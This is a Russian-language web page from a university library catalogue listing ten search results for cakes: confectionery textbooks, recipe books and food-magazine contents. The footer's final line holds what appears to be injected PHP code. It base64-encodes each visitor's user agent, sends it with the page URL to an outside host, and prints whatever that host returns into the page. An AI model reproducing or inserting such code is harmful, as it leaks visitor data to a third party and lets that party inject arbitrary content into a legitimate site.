Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

293 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ТОРТЫ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 10
1. 
Шепелев А. Ф. Товароведение и экспертиза кондитерских товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, И. А. Печенежская, А. В. Шмелев. - 223 с.
2. 
Табаторович, Александр Николаевич. Товароведение однородных групп продовольственных товаров (зерномучные и кондитерские товары) [Текст] / А. Н. Табаторович ; дар. А. Н. Табаторович, 2017. - 183 с.
Ключевые слова 
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебном пособии рассмотрены вопросы терминологии, классификации, пищевой ценности, формирования и оценки качества основных видов и разновидностей зерномучных и кондитерских товаров. Классификация ассортимента, показатели качества и безопасности представлены в соответствии с действующими нормативными документами и Техническими регламентами Таможенного союза.

Пособие предназначено для студентов, обучающихся по направлениям подготовки 38.03.07 "Товароведение" и 38.03.06 "Торговое дело". Может быть полезно для товароведов-экспертов, коммерсантов и других практических работников, чья деятельность связана с производством, продажей и хранением указанных групп товаров.

Полный текст
3. 
Питание и общество. - Журнал, 2004г. № 9
Оглавление 
  • Константинов, А. В удушливом кольце блокады / А. Константинов. - с.2-4
  • Гриценко, Н. В гостях у понтонников / Н. Гриценко. - с.6-7
  • Карпова, Елена. Парад мастеров. Тысяча счастливых лиц / Е. Карпова. - с.4-5
  • Королева, С. Анализ рынка общепита Москвы: тенденции и перспективы / С. Королева, Ю. Прохоров. - с.8-9
  • Закон о государственной поддержке малого бизнеса - отменить, изменить или заменить?. - с.10
  • Ждать не нужно! Действуйте. - с.11
  • Румянцева, Е. Как разработать бизнес-план / Е. Румянцева. - с.12-13
  • Ширяев, Владимир Сергеевич. Назло трудностям / В. С. Ширяев. - с.14-15
  • Роллы. - с.16
  • Особенности налогообложения предпринимателя без образования юридического лица (ПБОЮЛ) и юридического лица. - с.16-17
  • Бухгалтеру. Два разъяснения Минфина России. - с.16-17
  • Реализация сельхозпродукции. - с.16-17
  • Внесены изменения для применяющих УСН. - с.16-17
  • Расчет пособий по временной нетрудоспособности, беременности и родам. - с.16-17
  • Мороз, Евгений. Рисуем фруктово-ягодной палитрой. Рог изобилия из груши / Е. В. Мороз. - с.17
  • Приготовила Нелли Емельянова. - с.18-19
  • Сборник диетпитания. - с.20
  • Эвенштейн, З. Смородина / З. Эвенштейн. - с.20
  • Бероев, Б. Про котлеты и картошку / Б. Бероев. - с.21
  • Кацерикова, Н. Сладкие блюда из боярышника / Н. Кацерикова. - с.22
  • Румянцева, Е. Пестициды разрушают здоровье человека / Е. Румянцева. - с.23
  • Изделия Открытого Чемпионата России по кондитерскому искусству. - с.24
  • Искусство кулинаров "Газпрома". - с.25
  • Российская "копилка" наград высшей пробы стала тяжелее. - с.26-27
  • Наши в том же городе. - с.27
  • Кавалеры "Знака Достоинства" - 2003. - с.28
  • Федцов, В. Нравственные начала профессии официанта / В. Федцов. - с.30-31
  • "Культура ресторанного сервиса". - с.31
  • Свадебные торты - шелковые волны. - с.32,
Держатели документа (Информация об экземплярах) 
4. 
Питание и общество. - Журнал, 2009г. № 9
Оглавление 
  • Пасько, О. В. Молекулярная деструктивная кухня / О. В. Пасько, И. Крючкова. - с.2-3
    Кл. слова: ЭМУЛЬСИФИКАЦИЯ, СФЕРИФИКАЦИЯ, ЛЬДОМИКСИНГ
  • Мезенова, Э. Вперед, Россия! Давай, давай! / Э. Мезенова. - с.8-9
    Кл. слова: ДЕЛЬФИЙСКИЕ ИГРЫ
  • Номофилова, Н. Московские мастера`09 / Н. Номофилова. - с.10-11
    Кл. слова: КОНКУРС
  • Нечаева, Г. И снова - "Сладкий май" / Г. Нечаева. - с.12-13
    Кл. слова: КОНДИТЕР, ИСКУССТВО кондитерское
  • Кучер, Л. Оформление стола по заказу гостя / Л. Кучер, Л. Шкуратова. - с.14-15
    Кл. слова: СЕРВИРОВКА СТОЛА
  • Забнев, С. Дегустация эспрессо / С. Забнев. - с.16
  • Сучкова, Е. Уроки кондитера / Е. Сучкова. - с.18
    Кл. слова: ТОРТЫ СВАДЕБНЫЕ
  • Курбанов, Н. Кисломолочные продукты с салепом / Н. Курбанов. - с.23
    Кл. слова: САЛЕП
  • Филонов, М. Салат витаминами богат / М. Филонов. - с.24
    Кл. слова: ЛАТУК
  • Ежевика. - с.25
  • Блохина, И. Чем полезен сыр? И всем ли он полезен? / И. Блохина. - с.30
    Кл. слова: СЫР
5. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
6. 
Рыжакова, Алла Владимировна. Товароведение и экспертиза кондитерских товаров [Текст] : Учебник гриф-УМО / А. В. Рыжакова, 2005. - 224 с.

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".

7. 
Драгилев, Абрам Иосифович. Основы кондитерского производства [Текст] : Учеб. для вузов по специальностям "Технология хлеба, кондит. и макарон. изделий", "Машины и аппараты пищевых пр-в" / А. И. Драгилев, Г. А. Маршалкин, 1999. - 447 с.
8. 
Торты, пирожные, кексы, кремы [Текст] : рецепты кондитера / сост. Е. Синтюрев, 1991. - 34 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
9. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ
10. 
Ансель Торты [Текст] : [Рецепты] / Ансель, 1994. - 93 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3218 - 01.04.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.18 с.16 запросов, 2.35c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;